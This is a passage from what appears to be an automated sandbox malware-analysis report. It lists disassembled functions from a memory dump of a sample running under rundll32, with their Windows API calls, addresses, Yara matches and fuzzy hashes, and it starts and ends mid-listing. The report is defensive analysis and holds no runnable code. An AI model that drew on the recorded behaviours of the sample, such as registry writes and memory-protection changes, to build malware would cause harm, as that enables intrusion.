                                • Part of subcall function 0593C2AA: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,?,?,0593171E,?,?,00000000,?), ref: 0593C2B6
                                • Part of subcall function 0593C2AA: memcpy.NTDLL(00000000,00000000,00000000,00000002,?,?,0593171E,?,?,00000000,?), ref: 0593C2DE
                                • Part of subcall function 0593C2AA: memset.NTDLL ref: 0593C2F0
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandle$ErrorLastTime$CreateEventMappingSystemUnmapView_aulldiv_snwprintflstrlenmemcpymemset
                              • String ID:
                              • API String ID: 1106445334-0
                              • Opcode ID: 66360da6e0bc82c2fe483d7ae7c438f364afc32c268da613c9c6f5eeb7625e69
                              • Instruction ID: a9ccc661db972652c50c2656074875791c35d28179079479002a351b89be401c
                              • Opcode Fuzzy Hash: 66360da6e0bc82c2fe483d7ae7c438f364afc32c268da613c9c6f5eeb7625e69
                              • Instruction Fuzzy Hash: C2219F31628305ABDF11ABB4EC05E5ABBADFF41220B050A68F602D3250EF35ED51DF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594A651 Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,0593148A,?,?,?), ref: 0594A66F
                              • GetFileSize.KERNEL32(00000000,00000000,?,?,0593148A,?,?,?), ref: 0594A67F
                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,00000001,?,?,0593148A,?,?,?), ref: 0594A6AB
                              • GetLastError.KERNEL32(?,?,0593148A,?,?,?), ref: 0594A6D0
                              • CloseHandle.KERNEL32(000000FF,?,?,0593148A,?,?,?), ref: 0594A6E1
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateErrorHandleLastReadSize
                              • String ID:
                              • API String ID: 3577853679-0
                              • Opcode ID: b14e6a54f0fa2336952f93d20ddff677dc33577ce2d5ba912543dc13ed3d6f2c
                              • Instruction ID: 5d5ade108043430a086f324a6345d1fbd9723d20afb2a80e8a49e4722a915030
                              • Opcode Fuzzy Hash: b14e6a54f0fa2336952f93d20ddff677dc33577ce2d5ba912543dc13ed3d6f2c
                              • Instruction Fuzzy Hash: 8011D672154214BFDB205F68DC88EAEBB6EFB443A0F024525F91AA7180D6709D409FA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059375D8 Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,059487C2,?,?,?,00000000,00000001,00000000,?), ref: 059375E9
                              • StrRChrA.SHLWAPI(?,00000000,0000002F,?,00000000,6E2AA0A7,6E2AA0A7,?,059487C2,?,?,?,00000000,00000001,00000000,?), ref: 05937602
                              • StrTrimA.SHLWAPI(?,?,?,00000000,6E2AA0A7,6E2AA0A7,?,059487C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 0593762A
                              • StrTrimA.SHLWAPI(00000000,?,?,00000000,6E2AA0A7,6E2AA0A7,?,059487C2,?,?,?,00000000,00000001,00000000,?,00000000), ref: 05937639
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,?,00000000,6E2AA0A7,6E2AA0A7,?,059487C2,?,?,?), ref: 05937670
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Trim$FreeHeap
                              • String ID:
                              • API String ID: 2132463267-0
                              • Opcode ID: 730b3af04f4da1f26efb2df6881a505cd09378bfb434af124fb944f3977507f0
                              • Instruction ID: 2a3d63b31187b089c31ee03c3f77e44ae36a37afde657515b636b15037a4a1df
                              • Opcode Fuzzy Hash: 730b3af04f4da1f26efb2df6881a505cd09378bfb434af124fb944f3977507f0
                              • Instruction Fuzzy Hash: B9115872214305FBD7119BADDC96FAB7FADEB44694F150021BA09D7241EB70DE118790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594389D Relevance: 7.6, APIs: 5, Instructions: 68memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualProtect.KERNEL32(00000000,00000004,00000040,?,005DD5A8,?,?,00000000,00000000,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C), ref: 059438D4
                              • VirtualProtect.KERNEL32(00000000,00000004,?,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 05943904
                              • RtlEnterCriticalSection.NTDLL(0595A400), ref: 05943913
                              • RtlLeaveCriticalSection.NTDLL(0595A400), ref: 05943931
                              • GetLastError.KERNEL32(?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 05943941
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                              • String ID:
                              • API String ID: 653387826-0
                              • Opcode ID: b8c59a778065588ae040eea45cd56d5e4d2648bd8121856081379fa0fce65a15
                              • Instruction ID: fb0ed9c657304e5c14e9635704c9a9e88a3304506350b13745b7a1018934ee00
                              • Opcode Fuzzy Hash: b8c59a778065588ae040eea45cd56d5e4d2648bd8121856081379fa0fce65a15
                              • Instruction Fuzzy Hash: A721E6B5614702EFC710CFA8C985E5ABBF8FF082147008529EA5A97B00D770E994CF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05947408 Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 05947436
                              • GetLastError.KERNEL32 ref: 05947459
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0594746C
                              • GetLastError.KERNEL32 ref: 05947477
                              • HeapFree.KERNEL32(00000000,00000000), ref: 059474BF
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                              • String ID:
                              • API String ID: 1671499436-0
                              • Opcode ID: b5971ea0f9ef6d1c2dfbefe98ff7720fc18facec0afbbf75f6bd44acce1762f4
                              • Instruction ID: 1246c2600e3234f19f4ca9a307fc30c711749d82fe70c09b8c4a13896f80036f
                              • Opcode Fuzzy Hash: b5971ea0f9ef6d1c2dfbefe98ff7720fc18facec0afbbf75f6bd44acce1762f4
                              • Instruction Fuzzy Hash: 3C218B70514348EBEB218FA0D98AF7EBFBEFB41325F601518F142960A0DB749D958F11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05943775 Relevance: 7.6, APIs: 5, Instructions: 67memoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedIncrement.KERNEL32(0595A06C), ref: 05943785
                              • HeapFree.KERNEL32(00000000,?,00000000,?,?,00000001,00000191), ref: 059437DC
                              • InterlockedDecrement.KERNEL32(0595A06C), ref: 059437F1
                              • DeleteFileA.KERNEL32(00000000), ref: 0594380F
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594381D
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                                • Part of subcall function 0594508C: GetCurrentThreadId.KERNEL32 ref: 059450C4
                                • Part of subcall function 0594508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                                • Part of subcall function 0594508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                                • Part of subcall function 0594508C: lstrcpy.KERNEL32(00000000), ref: 05945100
                                • Part of subcall function 0593A316: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0593A391
                                • Part of subcall function 0593A316: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0593A3BD
                                • Part of subcall function 0593A316: _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 0593A3CD
                                • Part of subcall function 0593A316: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 0593A405
                                • Part of subcall function 0593A316: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 0593A427
                                • Part of subcall function 0593A316: GetShellWindow.USER32 ref: 0593A436
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileTempTimerWaitable$FreeHeapInterlockedPathTime$CreateCurrentDecrementDeleteIncrementMultipleNameObjectsShellSystemThreadWaitWindow_allmullstrcpy
                              • String ID:
                              • API String ID: 1587453479-0
                              • Opcode ID: d6677faeb58377a1e7d1ff11314e3f5f0fba83a93df368cf93aa6eea03592df8
                              • Instruction ID: bb9e0e44642265f20f103744ca8a5b5f2224ce43717d3d67fae9107fa5c54e6e
                              • Opcode Fuzzy Hash: d6677faeb58377a1e7d1ff11314e3f5f0fba83a93df368cf93aa6eea03592df8
                              • Instruction Fuzzy Hash: 8D117C75610208FFDB019FB0CC86EAF7FBDFB48290F104425FA099A101DBB59D949B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059326D3 Relevance: 7.6, APIs: 5, Instructions: 65registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 059326E7
                              • memcpy.NTDLL(00000000,?,?,?), ref: 05932710
                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 05932739
                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,00000000), ref: 05932759
                              • RegCloseKey.ADVAPI32(?), ref: 05932764
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Value$AllocateCloseCreateHeapmemcpy
                              • String ID:
                              • API String ID: 2954810647-0
                              • Opcode ID: cf1851890a3697924d875c1d3856174d4d3c3f42e0c909c06b5b961036a2f980
                              • Instruction ID: 49ad254aa766caf8e9fe4bc11e2dce065046256393a95d6fcabc759fdd00e25c
                              • Opcode Fuzzy Hash: cf1851890a3697924d875c1d3856174d4d3c3f42e0c909c06b5b961036a2f980
                              • Instruction Fuzzy Hash: 1F113776104205FBEF115F54AC8AEBF7F6DFB44691F044425FD02E2150DA719D20D7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593E57D Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(0593980C,?,?,?,?,00000008,0593980C,00000000,?), ref: 0593E59A
                              • memcpy.NTDLL(0593980C,?,00000009,?,?,?,?,00000008,0593980C,00000000,?), ref: 0593E5BC
                              • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 0593E5D4
                              • lstrlenW.KERNEL32(00000000,00000001,0593980C,?,?,?,?,?,?,?,00000008,0593980C,00000000,?), ref: 0593E5F4
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000008,0593980C,00000000,?), ref: 0593E619
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                              • String ID:
                              • API String ID: 3065863707-0
                              • Opcode ID: 8639ad83961cbece4b4eff4e9789ca90e405eaea57e9f5b4724fbd07ce6cbbfd
                              • Instruction ID: 5a9c51e33f80ed51857826b90573a1dba91dc831303205c4d541a0126a16675b
                              • Opcode Fuzzy Hash: 8639ad83961cbece4b4eff4e9789ca90e405eaea57e9f5b4724fbd07ce6cbbfd
                              • Instruction Fuzzy Hash: 81116679E15308FBCB119FA4DC0AF9EBFBCAB48351F004051F909E6281EB749658CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594FE94 Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcmpi.KERNEL32(00000000,?), ref: 0594FEC3
                              • RtlEnterCriticalSection.NTDLL(0595A428), ref: 0594FED0
                              • RtlLeaveCriticalSection.NTDLL(0595A428), ref: 0594FEE3
                              • lstrcmpi.KERNEL32(0595A440,00000000), ref: 0594FF03
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0593404D,00000000), ref: 0594FF17
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                              • String ID:
                              • API String ID: 1266740956-0
                              • Opcode ID: fdff772893490880b27de1eec7c229ca57a695ae3a98f57a97d60e4b23430e3c
                              • Instruction ID: 5bb70ea74987eb1e6ad47705ca79d63c65ce8af5bd5773d8b0341ff11bc10232
                              • Opcode Fuzzy Hash: fdff772893490880b27de1eec7c229ca57a695ae3a98f57a97d60e4b23430e3c
                              • Instruction Fuzzy Hash: 7C116D32518306AFCB15CFA8D849E6AFBF8FF45325F054155F80A93250D734AD218BA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05933263 Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000000,05953716,00000000,05942466,?,?,?,05948A07,?,?,?,00000000,00000001,00000000,?), ref: 0593326D
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • lstrcpy.KERNEL32(00000000,?), ref: 05933291
                              • StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,05948A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 05933298
                              • lstrcpy.KERNEL32(00000000,?), ref: 059332E0
                              • lstrcat.KERNEL32(00000000,?), ref: 059332EF
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                              • String ID:
                              • API String ID: 2616531654-0
                              • Opcode ID: 01403537e21c33257ed66e44b5d99383bdd4ee2e07edc9d8a77b38eb00178841
                              • Instruction ID: 180f669e2ac5afd2e74bacbd8667cdb0bfd59ba8ee09ff7be9dd7450ad3276df
                              • Opcode Fuzzy Hash: 01403537e21c33257ed66e44b5d99383bdd4ee2e07edc9d8a77b38eb00178841
                              • Instruction Fuzzy Hash: A2117076248306EBD721DAA9D88AF7BBBEDFB85611F050928F50AD3100EF24D855C761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594E3CD Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0594D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,0593243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0594D58C
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0594E3F6
                              • memcpy.NTDLL(00000000,?,?), ref: 0594E409
                              • RtlEnterCriticalSection.NTDLL(0595A428), ref: 0594E41A
                              • RtlLeaveCriticalSection.NTDLL(0595A428), ref: 0594E42F
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0594E467
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                              • String ID:
                              • API String ID: 2349942465-0
                              • Opcode ID: 5d9a4c7541a16686f11e72436704069d764ce7095ff86c39379bc8ca35d10903
                              • Instruction ID: 6ac493b521f73d47ac661010d0c282a672e96d697b67a1bd23e9812e2f92052b
                              • Opcode Fuzzy Hash: 5d9a4c7541a16686f11e72436704069d764ce7095ff86c39379bc8ca35d10903
                              • Instruction Fuzzy Hash: 7911C232219310AFC3115F24DC49C2BBFADFB89332701422AF90693210DB255C248BA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05944D17 Relevance: 7.6, APIs: 5, Instructions: 57memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(0593C1F8,00000000,00000000,00000000,?,05940FD9,?,0593C1F8,00000000), ref: 05944D2D
                              • lstrlen.KERNEL32(?,?,05940FD9,?,0593C1F8,00000000), ref: 05944D34
                              • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 05944D42
                                • Part of subcall function 0593EEF2: GetLocalTime.KERNEL32(?,?,?,?,0594FC9E,00000000,00000001), ref: 0593EEFC
                                • Part of subcall function 0593EEF2: wsprintfA.USER32 ref: 0593EF2F
                              • wsprintfA.USER32 ref: 05944D64
                                • Part of subcall function 0593ED48: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,05944D8C,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 0593ED66
                                • Part of subcall function 0593ED48: wsprintfA.USER32 ref: 0593ED8B
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 05944D95
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                              • String ID:
                              • API String ID: 3847261958-0
                              • Opcode ID: 8e2743e611ac1701efc00db652563ba40c89633237eb6071f69986432465e231
                              • Instruction ID: 724b2ec3ccb3472042f1249786e130b16f0f3d7073a016485fac0286f6eaff6e
                              • Opcode Fuzzy Hash: 8e2743e611ac1701efc00db652563ba40c89633237eb6071f69986432465e231
                              • Instruction Fuzzy Hash: 13016D32214218FFDB111F25EC49EABBF6EEF85261B058121FD1D96211DB32AD25DFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594DCF6 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                              Download Yara Rule
                              APIs
                              • ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,0593DBAC,?,?,00000000,05933EC6,?,00000000), ref: 0594DD35
                              • ResetEvent.KERNEL32(?,?,0593DBAC,?,?,00000000,05933EC6,?,00000000), ref: 0594DD3A
                              • GetLastError.KERNEL32(0593DBAC,?,?,00000000,05933EC6,?,00000000), ref: 0594DD55
                              • GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,0593DBAC,?,?,00000000,05933EC6,?,00000000), ref: 0594DD84
                                • Part of subcall function 0593D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0594DD0F,00000000,00000000,00000004,00000000,?,0593DBAC,?,?,00000000), ref: 0593D435
                                • Part of subcall function 0593D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0594DD0F,00000000,00000000,00000004,00000000,?,0593DBAC,?), ref: 0593D493
                                • Part of subcall function 0593D429: lstrcpy.KERNEL32(00000000,00000000), ref: 0593D4A3
                              • SetEvent.KERNEL32(?,0593DBAC,?,?,00000000,05933EC6,?,00000000), ref: 0594DD76
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                              • String ID:
                              • API String ID: 1449191863-0
                              • Opcode ID: 9842361de33daf99bd12524543565bcab798153eb0aa5afc67137a964519d3c3
                              • Instruction ID: f8a75a32a62077ddc0e86bc0c44f251353b6f0d6de9361d598424b7ca4fac732
                              • Opcode Fuzzy Hash: 9842361de33daf99bd12524543565bcab798153eb0aa5afc67137a964519d3c3
                              • Instruction Fuzzy Hash: 81114CB5104709AFDB21AF64DC48EAA7BA9FF44364F104620F916814A1C731E865DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05950A9D Relevance: 7.6, APIs: 5, Instructions: 55memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 05950AB4
                                • Part of subcall function 0594EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0594EC20
                                • Part of subcall function 0594EC09: SetEvent.KERNEL32(?,?,?,?,05933EC6,?,?), ref: 0594EC30
                              • lstrlen.KERNEL32(?,?,?,?,?,0593859B,?,?), ref: 05950AD7
                              • lstrlen.KERNEL32(?,?,?,?,0593859B,?,?), ref: 05950AE1
                              • memcpy.NTDLL(?,?,00004000,?,?,0593859B,?,?), ref: 05950AF2
                              • HeapFree.KERNEL32(00000000,?,?,?,?,0593859B,?,?), ref: 05950B14
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
                              • String ID:
                              • API String ID: 442095154-0
                              • Opcode ID: 95f4487ccce8ebe295e80b93d9895b4c0bdc121bace2ab5439bc432aae3d98f9
                              • Instruction ID: 047de7f3fa963011e0b56738ee5cc57c3c2dc4681bd821b4bbfd31cf018a5876
                              • Opcode Fuzzy Hash: 95f4487ccce8ebe295e80b93d9895b4c0bdc121bace2ab5439bc432aae3d98f9
                              • Instruction Fuzzy Hash: 87118E75614204EFCB11DF65EC49E5EBFB9FB85365F204024F90AA3210EB31AD249B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05947A3E Relevance: 7.5, APIs: 5, Instructions: 49memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0593AE7C: lstrlen.KERNEL32(0593E448,00000000,00000000,?,?,05947A5B,?,?,?,?,0593E448,?), ref: 0593AE8B
                                • Part of subcall function 0593AE7C: mbstowcs.NTDLL ref: 0593AEA7
                              • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0593E448,?), ref: 05947A6A
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05947A7C
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0593E448,?), ref: 05947A99
                              • lstrlenW.KERNEL32(00000000,?,?,0593E448,?), ref: 05947AA5
                              • HeapFree.KERNEL32(00000000,00000000,?,?,0593E448,?), ref: 05947AB9
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                              • String ID:
                              • API String ID: 3403466626-0
                              • Opcode ID: ddbdd5a02448e46a0fcd116b4db97ba6144718232cafae728f4643edfe0806ff
                              • Instruction ID: 14273e390adedb20d6d8a5a89c97db16d01e3757800e5964639e64e405895f47
                              • Opcode Fuzzy Hash: ddbdd5a02448e46a0fcd116b4db97ba6144718232cafae728f4643edfe0806ff
                              • Instruction Fuzzy Hash: 5A014C72115318FFD7119FA8EC8AFAABFACEF49315F010015FA0997151CB749D258BA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593F49F Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32 ref: 0593F4BF
                              • GetModuleHandleA.KERNEL32 ref: 0593F4CD
                              • LoadLibraryExW.KERNEL32(?,?,?), ref: 0593F4DA
                              • GetModuleHandleA.KERNEL32 ref: 0593F4F1
                              • GetModuleHandleA.KERNEL32 ref: 0593F4FD
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HandleModule$LibraryLoad
                              • String ID:
                              • API String ID: 1178273743-0
                              • Opcode ID: c6b9276fd289bc3d04b057d5f6277ce94aa6756cb03ec58657a289f4ec18bba6
                              • Instruction ID: 7080e8f3c5274984567102cecc605ca89f227632bc89fd9ff916d2f9d83c8823
                              • Opcode Fuzzy Hash: c6b9276fd289bc3d04b057d5f6277ce94aa6756cb03ec58657a289f4ec18bba6
                              • Instruction Fuzzy Hash: CF012432A1830AEBEF015F69ED8296ABFA9BF452617040026FD1882120EF75DC21CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594BDC6 Relevance: 7.5, APIs: 5, Instructions: 42stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,0593396C), ref: 0594BDCC
                              • StrTrimA.SHLWAPI(00000001,?,?,0593396C), ref: 0594BDEF
                              • StrTrimA.SHLWAPI(00000000,?,?,0593396C), ref: 0594BDFE
                              • _strupr.NTDLL ref: 0594BE01
                              • lstrlen.KERNEL32(00000000,0593396C), ref: 0594BE09
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Trim$_struprlstrlen
                              • String ID:
                              • API String ID: 2280331511-0
                              • Opcode ID: 692601097ca16181d35f42dfec9f0694d7e989963e276ca53d51524b400e3b17
                              • Instruction ID: db8d1e76f08d6cce09c851307adfcb9f3f2d6f2af92bb8777f6f4542dc3696e2
                              • Opcode Fuzzy Hash: 692601097ca16181d35f42dfec9f0694d7e989963e276ca53d51524b400e3b17
                              • Instruction Fuzzy Hash: C5F06271319211AFE715DB24EC89E3BBBACEB45665B100159F909C7241DF249D118764
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05951659 Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlEnterCriticalSection.NTDLL(0595A400), ref: 05951664
                              • RtlLeaveCriticalSection.NTDLL(0595A400), ref: 05951675
                              • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,05944B8B,?,?,0595A428,059325BA,00000003), ref: 0595168C
                              • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,05944B8B,?,?,0595A428,059325BA,00000003), ref: 059516A6
                              • GetLastError.KERNEL32(?,?,05944B8B,?,?,0595A428,059325BA,00000003), ref: 059516B3
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                              • String ID:
